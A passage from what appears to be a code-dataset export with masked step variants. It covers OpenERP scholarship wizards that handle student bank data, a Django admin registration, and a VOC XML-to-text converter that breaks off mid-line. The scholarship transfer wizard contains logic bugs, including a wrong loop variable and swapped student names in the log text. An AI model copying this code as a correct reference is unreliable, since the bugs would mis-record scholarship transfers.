rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n False, 'tipo_bolsa': False, 'valor_bolsa': False})\n rem.doc_discente_id.write({'state': 'n_bolsista'})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Remoção de bolsa: \"%s\"' % rem.doc_discente_id.discente_id\n .name, 'envolvidos_ids': [(4, rem.doc_discente_id.\n discente_id.id)], 'descricao': \n u'A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida.' %\n (rem.doc_discente_id.discente_id.name.upper(), perfil.\n matricula)}\n rem.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n",
"step-5": "# coding: utf-8\nfrom openerp import SUPERUSER_ID\nfrom openerp.osv import osv, fields\nfrom openerp.addons.ud.ud import _TIPOS_BOLSA\n\nTIPOS_BOLSA = dict(_TIPOS_BOLSA)\n\n\ndef get_banco(cls, cr, browse_record, usuario_id, context=None):\n dados_bancarios_model = cls.pool.get(\"ud.dados.bancarios\")\n args = [(\"banco_id\", \"=\", browse_record.banco_id.id)]\n if browse_record.agencia_v:\n args.append((\"agencia\", \"=\", browse_record.agencia))\n if browse_record.dv_agencia_v:\n args.append((\"dv_agencia\", \"=\", browse_record.dv_agencia))\n if browse_record.conta_v:\n args.append((\"conta\", \"=\", browse_record.conta))\n if browse_record.dv_conta_v:\n args.append((\"dv_conta\", \"=\", browse_record.dv_conta))\n if browse_record.operacao_v:\n args.append((\"operacao\", \"=\", browse_record.operacao))\n dados_bancarios = dados_bancarios_model.search(cr, SUPERUSER_ID, args, context=context)\n if dados_bancarios:\n dados_bancarios = dados_bancarios_model.browse(cr, SUPERUSER_ID, dados_bancarios[0])\n if not dados_bancarios.ud_conta_id:\n return dados_bancarios.id\n elif dados_bancarios.ud_conta_id.id == usuario_id:\n return dados_bancarios.id\n raise osv.except_osv(u\"Dados Bancários duplicados\", u\"Outra pessoa já possui esses dados bancários!\")\n dados = {\"banco_id\": browse_record.banco_id.id, \"agencia\": browse_record.agencia, \"dv_agencia\": browse_record.dv_agencia,\n \"conta\": browse_record.conta, \"dv_conta\": browse_record.dv_conta, \"operacao\": browse_record.operacao,\n \"ud_conta_id\": usuario_id}\n return dados_bancarios_model.create(cr, SUPERUSER_ID, dados, context=context)\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n _name = \"ud.monitoria.bolsa.adicionar.wizard\"\n _description = u\"Inclusão de bolsa de monitoria para discente (UD)\"\n\n _STATES = [\n (\"n_bolsista\", u\"Não Bolsista\"),\n (\"reserva\", u\"Cadastro de Reserva\"),\n ]\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get(\"ud.monitoria.oferta.disciplina\")\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n\n _columns = {\n \"semestre_id\": fields.many2one(\"ud.monitoria.registro\", u\"Semestre\", required=True, readonly=True),\n \"curso_id\": fields.many2one(\"ud.curso\", u\"Curso\", required=True, domain=\"[('is_active', '=', True)]\"),\n \"disciplina_id\": fields.many2one(\"ud.monitoria.disciplina\", u\"Disciplinas\", required=True,\n domain=\"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id), \"\n \"('is_active', '=', True)]\"),\n \"bolsas\": fields.function(_bolsas, type=\"integer\", string=u\"Bolsas disponíveis\",\n help=u\"Número de bolsas disponíveis para a disciplina\"),\n \"valor_bolsa\": fields.float(u\"Bolsa (R$)\"),\n \"tutor\": fields.boolean(u\"Tutor?\"),\n \"status\": fields.selection(_STATES, u\"Status\", required=True),\n \"doc_discente_id\": fields.many2one(\"ud.monitoria.documentos.discente\", u\"Discente\", required=True,\n domain=\"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), \"\n \"('is_active', '=', True), ('state', '=', status)]\"),\n # DADOS BANCÁRIOS\n \"dados_bancarios_id\": fields.many2one(\"ud.dados.bancarios\", u\"Dados Bancários\", domain=[('id', '=', False)]),\n \"banco_id\": fields.many2one(\"ud.banco\", u\"Banco\", ondelete=\"restrict\"),\n \"agencia\": fields.char(u\"Agência\", size=4, help=u\"Número da Agência\"),\n \"dv_agencia\": fields.char(u\"DV Agência\", size=2, help=u\"Dígito verificador da Agência\"),\n \"conta\": fields.char(u\"Conta\", size=10, help=u\"Número da Conta\"),\n \"dv_conta\": fields.char(u\"DV Conta\", size=1, help=u\"Dígito verificador da Conta\"),\n \"operacao\": fields.char(u\"Operação\", size=3, help=u\"Tipo de conta\"),\n\n \"agencia_v\": fields.related(\"banco_id\", \"agencia\", type=\"boolean\", invisible=True, readonly=True),\n \"dv_agencia_v\": fields.related(\"banco_id\", \"dv_agencia\", type=\"boolean\", invisible=True, readonly=True),\n \"conta_v\": fields.related(\"banco_id\", \"conta\", type=\"boolean\", invisible=True, readonly=True),\n \"dv_conta_v\": fields.related(\"banco_id\", \"dv_conta\", type=\"boolean\", invisible=True, readonly=True),\n \"operacao_v\": fields.related(\"banco_id\", \"operacao\", type=\"boolean\", invisible=True, readonly=True),\n }\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid, fields_list, context)\n res[\"status\"] = \"n_bolsista\"\n res[\"valor_bolsa\"] = 400.\n context = context or {}\n if context.get(\"active_id\", False):\n if context.get(\"active_model\", False) == \"ud.monitoria.registro\":\n res[\"semestre_id\"] = context.get(\"active_id\")\n elif context.get(\"active_model\", False) == \"ud.monitoria.documentos.discente\":\n doc = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, context.get(\"active_id\"), context)\n if doc.state == \"bolsista\":\n raise osv.except_osv(u\"Discente bolsista\", u\"O discente já é bolsista\")\n elif not doc.is_active:\n raise osv.except_osv(u\"Documento do discente inativo\", u\"Não é possível alterar o status de discentes inativos\")\n res[\"semestre_id\"] = doc.disciplina_id.semestre_id.id\n res[\"curso_id\"] = doc.disciplina_id.curso_id.id\n res[\"disciplina_id\"] = doc.disciplina_id.id\n res[\"tutor\"] = doc.tutor\n res[\"status\"] = doc.state\n res[\"doc_discente_id\"] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id, disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {\"value\": {\"disciplina_id\": False}}\n reg = self.pool.get(\"ud.monitoria.registro\").read(cr, uid, semestre_id, [\"processos_seletivos_ids\"], context=context, load=\"_classic_write\")\n args = [(\"curso_id\", \"=\", curso_id), (\"processo_seletivo_id\", \"=\", reg[\"processos_seletivos_ids\"]), (\"is_active\", \"=\", True)]\n disc = self.pool.get(\"ud.monitoria.disciplina\").search(cr, uid, args, context=context)\n res = {\"domain\": {\"disciplina_id\": [(\"id\", \"in\", disc)]}}\n if not disc:\n res[\"value\"]= {\"disciplina_id\": False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id, doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, doc_discente_id, context)\n doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False\n disciplina_id = self.pool.get(\"ud.monitoria.disciplina\").browse(cr, uid, disciplina_id, context)\n return {\n \"value\": {\"doc_discente_id\": doc_discente_id,\n \"bolsas\": disciplina_id.bolsas}\n }\n return {\"value\": {\"doc_discente_id\": False, \"bolsas\": 0}}\n\n def onchange_doc_discente(self, cr, uid, ids, doc_discente_id, dados_bancarios_id, context=None):\n if doc_discente_id:\n doc = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, doc_discente_id, context)\n if not dados_bancarios_id:\n dados_bancarios_id = getattr(doc.dados_bancarios_id, \"id\", False)\n return {\"value\": {\"dados_bancarios_id\": dados_bancarios_id},\n \"domain\": {\"dados_bancarios_id\": [(\"ud_conta_id\", \"=\", doc.discente_id.id)]}}\n return {\"value\": {\"dados_bancarios_id\": False},\n \"domain\": {\"dados_bancarios_id\": [(\"id\", \"=\", False)]}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get(\"ud.banco\").read(cr, uid, banco_id, [\n \"agencia\", \"dv_agencia\", \"conta\", \"dv_conta\", \"operacao\"\n ], context=context, load=\"_classic_write\")\n vals = {\"agencia\": False, \"dv_agencia\": False, \"conta\": False, \"dv_conta\": False, \"operacao\": False}\n vals.update({\"%s_v\" % dado: banco.get(dado) for dado in banco.keys()})\n return {\"value\": vals}\n return {\"value\": {\"agencia_v\": False, \"dv_agencia_v\": False, \"conta_v\": False, \"dv_conta_v\": False,\"operacao_v\": False,\n \"agencia\": False, \"dv_agencia\": False, \"conta\": False, \"dv_conta\": False, \"operacao\": False}}\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get(\"ud.perfil\")\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise osv.except_osv(u\"Bolsas Insuficientes\", u\"Não há bolsas disponíveis para essa disciplina\")\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u\"Documento do discente inativo\",\n u\"O discente não pode ser classificado como bolsista\")\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(\n u\"Discente bolsista\",\n u\"O discente \\\"{}\\\" sob matrícula \\\"{}\\\" possui bolsa do tipo: \\\"{}\\\"\".format(\n add.doc_discente_id.discente_id.name, add.doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.tipo_bolsa]\n )\n )\n responsavel = self.pool.get(\"ud.employee\").search(cr, SUPERUSER_ID, [(\"user_id\", \"=\", uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(\n u\"Registro Inexistente\",\n u\"Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo\"\n )\n if len(responsavel) > 1:\n raise osv.except_osv(\n u\"Multiplos vínculos\",\n u\"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo\"\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.inscricao_id.perfil_id.id, {\n \"is_bolsista\": True, \"tipo_bolsa\": \"m\", \"valor_bolsa\": (\"%.2f\" % add.valor_bolsa).replace(\".\", \",\")\n })\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({\"state\": \"bolsista\", \"dados_bancarios_id\": dados_bancarios})\n evento = {\n \"responsavel_id\": responsavel[0],\n \"name\": u\"Adição de bolsa: \\\"%s\\\"\" % add.doc_discente_id.discente_id.name,\n \"envolvidos_ids\": [(4, add.doc_discente_id.discente_id.id)],\n \"descricao\": u\"Uma bolsa de R$ %s foi vinculada para o(a) discente \\\"%s\\\" sob matrícula \\\"%s\\\".\" % (\n (\"%.2f\" % add.valor_bolsa).replace(\".\", \",\"),\n add.doc_discente_id.discente_id.name.upper(), add.doc_discente_id.inscricao_id.perfil_id.matricula\n )\n }\n add.semestre_id.write({\"eventos_ids\": [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = \"ud.monitoria.bolsa.transferir.wizard\"\n _description = u\"Transferência de bolsa de monitoria (UD)\"\n\n _STATES = [\n (\"n_bolsista\", u\"Não Bolsista\"),\n (\"reserva\", u\"Cadastro de Reserva\"),\n ]\n\n _columns = {\n \"semestre_id\": fields.many2one(\"ud.monitoria.registro\", u\"Semestre\", required=True, readonly=True),\n\n \"curso_id_de\": fields.many2one(\"ud.curso\", u\"Curso\", required=True, domain=\"[('is_active', '=', True)]\"),\n \"disciplina_id_de\": fields.many2one(\"ud.monitoria.disciplina\", u\"Disciplinas\", required=True,\n domain=\"[('id', '=', False)]\"),\n \"tutor_de\": fields.boolean(u\"Tutor?\"),\n \"doc_discente_id_de\": fields.many2one(\"ud.monitoria.documentos.discente\", u\"Discente\", required=True,\n domain=\"[('is_active', '=', True), ('state', '=', 'bolsista'), \"\n \"('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"),\n\n \"curso_id_para\": fields.many2one(\"ud.curso\", u\"Curso\", required=True, domain=\"[('is_active', '=', True)]\"),\n \"disciplina_id_para\": fields.many2one(\"ud.monitoria.disciplina\", u\"Disciplinas\", required=True,\n domain=\"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), \"\n \"('is_active', '=', True)]\"),\n \"tutor_para\": fields.boolean(u\"Tutor?\"),\n \"status_para\": fields.selection(_STATES, u\"Status\", required=True),\n \"doc_discente_id_para\": fields.many2one(\"ud.monitoria.documentos.discente\", u\"Discente\", required=True,\n domain=\"[('is_active', '=', True), ('state', '=', status_para), \"\n \"('disciplina_id', '=', disciplina_id_para), \"\n \"('tutor', '=', tutor_para)]\"),\n # DADOS BANCÁRIOS\n \"banco_id\": fields.many2one(\"ud.banco\", u\"Banco\", ondelete=\"restrict\"),\n \"agencia\": fields.char(u\"Agência\", size=4, help=u\"Número da Agência\"),\n \"dv_agencia\": fields.char(u\"DV Agência\", size=2, help=u\"Dígito verificador da Agência\"),\n \"conta\": fields.char(u\"Conta\", size=10, help=u\"Número da Conta\"),\n \"dv_conta\": fields.char(u\"DV Conta\", size=1, help=u\"Dígito verificador da Conta\"),\n \"operacao\": fields.char(u\"Operação\", size=3, help=u\"Tipo de conta\"),\n\n \"agencia_v\": fields.related(\"banco_id\", \"agencia\", type=\"boolean\", invisible=True, readonly=True),\n \"dv_agencia_v\": fields.related(\"banco_id\", \"dv_agencia\", type=\"boolean\", invisible=True, readonly=True),\n \"conta_v\": fields.related(\"banco_id\", \"conta\", type=\"boolean\", invisible=True, readonly=True),\n \"dv_conta_v\": fields.related(\"banco_id\", \"dv_conta\", type=\"boolean\", invisible=True, readonly=True),\n \"operacao_v\": fields.related(\"banco_id\", \"operacao\", type=\"boolean\", invisible=True, readonly=True),\n }\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid, fields_list, context)\n context = context or {}\n if context.get(\"active_id\", False):\n if context.get(\"active_model\", False) == \"ud.monitoria.registro\":\n res[\"semestre_id\"] = context.get(\"active_id\")\n elif context.get(\"active_model\", False) == \"ud.monitoria.documentos.discente\":\n doc = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, context.get(\"active_id\"),\n context)\n if doc.state != \"bolsista\":\n raise osv.except_osv(u\"Discente bolsista\", u\"O discente já é bolsista\")\n elif not doc.is_active:\n raise osv.except_osv(u\"Documento do discente inativo\",\n u\"O discente não pode ser classificado como bolsista\")\n res[\"semestre_id\"] = doc.disciplina_id.semestre_id.id\n res[\"curso_id_de\"] = doc.disciplina_id.curso_id.id\n res[\"disciplina_id_de\"] = doc.disciplina_id.id\n res[\"tutor_de\"] = doc.tutor\n res[\"status_de\"] = doc.state\n res[\"doc_discente_id_de\"] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id, disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {\"value\": {\"disciplina_id_\" + comp: False}}\n reg = self.pool.get(\"ud.monitoria.registro\").read(cr, uid, semestre_id, [\"processos_seletivos_ids\"], context=context, load=\"_classic_write\")\n args = [(\"curso_id\", \"=\", curso_id), (\"processo_seletivo_id\", \"=\", reg[\"processos_seletivos_ids\"]), (\"is_active\", \"=\", True)]\n disc = self.pool.get(\"ud.monitoria.disciplina\").search(cr, uid, args, context=context)\n res = {\"domain\": {\"disciplina_id_\" + comp: [(\"id\", \"in\", disc)]}}\n if not disc:\n res[\"value\"] = {\"disciplina_id_\" + comp: False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id, doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, doc_discente_id, context)\n doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False\n return {\n \"value\": {\"doc_discente_id_\" + comp: doc_discente_id}\n }\n return {\"value\": {\"doc_discente_id_\" + comp: False}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get(\"ud.banco\").read(cr, uid, banco_id, [\n \"agencia\", \"dv_agencia\", \"conta\", \"dv_conta\", \"operacao\"\n ], context=context, load=\"_classic_write\")\n vals = {\"agencia\": False, \"dv_agencia\": False, \"conta\": False, \"dv_conta\": False, \"operacao\": False}\n vals.update({\"%s_v\" % dado: banco.get(dado) for dado in banco.keys()})\n return {\"value\": vals}\n return {\"value\": {\"agencia_v\": False, \"dv_agencia_v\": False, \"conta_v\": False, \"dv_conta_v\": False,\"operacao_v\": False,\n \"agencia\": False, \"dv_agencia\": False, \"conta\": False, \"dv_conta\": False, \"operacao\": False}}\n\n def botao_transferir(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get(\"ud.perfil\")\n for transf in self.browse(cr, uid, ids, context):\n matricula = transf.doc_discente_id_para.discente_id.matricula\n for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == \"a\":\n if perfil.is_bolsista:\n raise osv.except_osv(\n u\"Discente bolsista\",\n u\"O discente \\\"{}\\\" sob matrícula \\\"{}\\\" possui bolsa do tipo: \\\"{}\\\"\".format(\n transf.doc_discente_id_para.discente_id.pessoa_id.name, matricula,\n TIPOS_BOLSA[perfil.tipo_bolsa]\n )\n )\n break\n if not perfil:\n raise osv.except_osv(\n u\"Perfil excluído\",\n u\"O perfil do discente para a matrícula \\\"%s\\\" não existe ou foi excluído\" % matricula or \"\"\n )\n matricula = transf.doc_discente_id_de.discente_id.matricula\n for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == \"a\":\n break\n responsavel = self.pool.get(\"ud.employee\").search(cr, SUPERUSER_ID, [(\"user_id\", \"=\", uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(\n u\"Registro Inexistente\",\n u\"Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo\"\n )\n if len(responsavel) > 1:\n raise osv.except_osv(\n u\"Multiplos vínculos\",\n u\"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo\"\n )\n valor = perfil_de.valor_bolsa\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {\n \"is_bolsista\": True, \"tipo_bolsa\": \"m\", \"valor_bolsa\": valor\n })\n perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n \"is_bolsista\": False, \"tipo_bolsa\": False, \"valor_bolsa\": False\n })\n transf.doc_discente_id_de.write({\"state\": \"n_bolsista\"})\n transf.doc_discente_id_para.write({\"state\": \"bolsista\", \"is_active\": True})\n get_banco(self, cr, transf, transf.doc_discente_id_para.discente_id.pessoa_id.id, context)\n evento = {\n \"responsavel_id\": responsavel[0],\n \"name\": u\"Transferência de bolsa\",\n \"envolvidos_ids\": [(4, transf.doc_discente_id_de.discente_id.pessoa_id.id),\n (4, transf.doc_discente_id_para.discente_id.pessoa_id.id)],\n \"descricao\": u\"Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula \"\n u\"%(matricula_de)s para o(a) discente \\\"%(discente_para)s\\\" sob matrícula\"\n u\"\\\"%(matricula_para)s\\\".\" % {\n \"valor\": valor, \"discente_de\": transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n \"matricula_de\": perfil_de.matricula,\n \"discente_para\": transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n \"matricula_para\": perfil_de.matricula\n }\n }\n transf.semestre_id.write({\"eventos_ids\": [(0, 0, evento)]})\n return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n _name = \"ud.monitoria.bolsa.remover.wizard\"\n _description = u\"Remoção de bolsa de discente\"\n\n _columns = {\n \"semestre_id\": fields.many2one(\"ud.monitoria.registro\", u\"Semestre\", required=True, readonly=True),\n \"curso_id\": fields.many2one(\"ud.curso\", u\"Curso\", required=True, domain=\"[('is_active', '=', True)]\"),\n \"disciplina_id\": fields.many2one(\"ud.monitoria.disciplina\", u\"Disciplinas\", required=True,\n domain=\"[('id', '=', False)]\"),\n \"tutor\": fields.boolean(u\"Tutor?\"),\n \"doc_discente_id\": fields.many2one(\"ud.monitoria.documentos.discente\", u\"Discente\", required=True,\n domain=\"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), \"\n \"('is_active', '=', True), ('state', '=', 'bolsista')]\"),\n }\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(RemoverBolsaWizard, self).default_get(cr, uid, fields_list, context)\n context = context or {}\n if context.get(\"active_id\", False):\n if context.get(\"active_model\", False) == \"ud.monitoria.registro\":\n res[\"semestre_id\"] = context.get(\"active_id\")\n elif context.get(\"active_model\", False) == \"ud.monitoria.documentos.discente\":\n doc = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, context.get(\"active_id\"), context)\n if doc.state != \"bolsista\":\n raise osv.except_osv(u\"Discente não bolsista\", u\"O discente não é bolsista\")\n elif not doc.is_active:\n raise osv.except_osv(u\"Documento do discente inativo\",\n u\"Não é possível alterar o status de discentes inativos\")\n res[\"semestre_id\"] = doc.disciplina_id.semestre_id.id\n res[\"curso_id\"] = doc.disciplina_id.curso_id.id\n res[\"disciplina_id\"] = doc.disciplina_id.id\n res[\"tutor\"] = doc.tutor\n res[\"doc_discente_id\"] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id, disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {\"value\": {\"disciplina_id\": False}}\n reg = self.pool.get(\"ud.monitoria.registro\").read(cr, uid, semestre_id, [\"processos_seletivos_ids\"], context=context, load=\"_classic_write\")\n args = [(\"curso_id\", \"=\", curso_id), (\"processo_seletivo_id\", \"=\", reg[\"processos_seletivos_ids\"]), (\"is_active\", \"=\", True)]\n disc = self.pool.get(\"ud.monitoria.disciplina\").search(cr, uid, args, context=context)\n res = {\"domain\": {\"disciplina_id\": [(\"id\", \"in\", disc)]}}\n if not disc:\n res[\"value\"] = {\"disciplina_id\": False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id, doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get(\"ud.monitoria.documentos.discente\").browse(cr, uid, doc_discente_id, context)\n doc_discente_id = doc_discente_id if doc_discente.disciplina_id.id == disciplina_id else False\n return {\n \"value\": {\"doc_discente_id\": doc_discente_id}\n }\n return {\"value\": {\"doc_discente_id\": False}}\n\n def botao_remover(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get(\"ud.perfil\")\n pessoa_model = self.pool.get(\"ud.employee\")\n for rem in self.browse(cr, uid, ids, context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [(\"user_id\", \"=\", uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(\n u\"Registro Inexistente\",\n u\"Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo\"\n )\n if len(responsavel) > 1:\n raise osv.except_osv(\n u\"Multiplos vínculos\",\n u\"Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo\"\n )\n perfil = rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {\n \"is_bolsista\": False, \"tipo_bolsa\": False, \"valor_bolsa\": False\n })\n rem.doc_discente_id.write({\"state\": \"n_bolsista\"})\n evento = {\n \"responsavel_id\": responsavel[0],\n \"name\": u\"Remoção de bolsa: \\\"%s\\\"\" % rem.doc_discente_id.discente_id.name,\n \"envolvidos_ids\": [(4, rem.doc_discente_id.discente_id.id)],\n \"descricao\": u\"A bolsa do discente \\\"%s\\\" sob matrícula \\\"%s\\\" foi removida.\" % (\n rem.doc_discente_id.discente_id.name.upper(), perfil.matricula\n )\n }\n rem.semestre_id.write({\"eventos_ids\": [(0, 0, evento)]})\n return True\n",
"step-ids": [
18,
20,
22,
24,
26
]
}
|
[
18,
20,
22,
24,
26
] |
from django.contrib import admin
from .models import Spot
from leaflet.admin import LeafletGeoAdmin
class SpotAdmin(LeafletGeoAdmin):
pass
admin.site.register(Spot, SpotAdmin)
|
normal
|
{
"blob_id": "7633944366c6655306bc41087b19a474e9c414b5",
"index": 7688,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass SpotAdmin(LeafletGeoAdmin):\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SpotAdmin(LeafletGeoAdmin):\n pass\n\n\nadmin.site.register(Spot, SpotAdmin)\n",
"step-4": "from django.contrib import admin\nfrom .models import Spot\nfrom leaflet.admin import LeafletGeoAdmin\n\n\nclass SpotAdmin(LeafletGeoAdmin):\n pass\n\n\nadmin.site.register(Spot, SpotAdmin)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def run(path, output):
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file + '.txt')
l = []
for member in root.findall('object'):
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
l.append([iclass, int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text), int(member.
find('bndbox').find('xmax').text) - int(member.find(
'bndbox').find('xmin').text), int(member.find('bndbox').
find('ymax').text) - int(member.find('bndbox').find('ymin')
.text), int(root.find('size')[0].text), int(root.find(
'size')[1].text)])
np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',
newline='\n')
print('Successfully converted xml to txt.')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def run(path, output):
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file + '.txt')
l = []
for member in root.findall('object'):
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
l.append([iclass, int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text), int(member.
find('bndbox').find('xmax').text) - int(member.find(
'bndbox').find('xmin').text), int(member.find('bndbox').
find('ymax').text) - int(member.find('bndbox').find('ymin')
.text), int(root.find('size')[0].text), int(root.find(
'size')[1].text)])
np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',
newline='\n')
print('Successfully converted xml to txt.')
<|reserved_special_token_0|>
ap.add_argument('-p', '--path', required=True, help='annotations path')
ap.add_argument('-o', '--output', required=True, help='txt output path')
<|reserved_special_token_0|>
print()
print()
print()
print(
'=========================================================================='
)
print(
' ATENTION '
)
print()
print(
' ATENTION '
)
print()
print()
print('Hi body - dont forget update CLASS NAMES')
print()
print(
'=========================================================================='
)
print()
print()
print()
run(args['path'], args['output'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def run(path, output):
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file + '.txt')
l = []
for member in root.findall('object'):
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
l.append([iclass, int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text), int(member.
find('bndbox').find('xmax').text) - int(member.find(
'bndbox').find('xmin').text), int(member.find('bndbox').
find('ymax').text) - int(member.find('bndbox').find('ymin')
.text), int(root.find('size')[0].text), int(root.find(
'size')[1].text)])
np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',
newline='\n')
print('Successfully converted xml to txt.')
ap = argparse.ArgumentParser()
ap.add_argument('-p', '--path', required=True, help='annotations path')
ap.add_argument('-o', '--output', required=True, help='txt output path')
args = vars(ap.parse_args())
print()
print()
print()
print(
'=========================================================================='
)
print(
' ATENTION '
)
print()
print(
' ATENTION '
)
print()
print()
print('Hi body - dont forget update CLASS NAMES')
print()
print(
'=========================================================================='
)
print()
print()
print()
run(args['path'], args['output'])
<|reserved_special_token_1|>
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET
import argparse
import numpy as np
def run(path, output):
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file + '.txt')
l = []
for member in root.findall('object'):
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
l.append([iclass, int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text), int(member.
find('bndbox').find('xmax').text) - int(member.find(
'bndbox').find('xmin').text), int(member.find('bndbox').
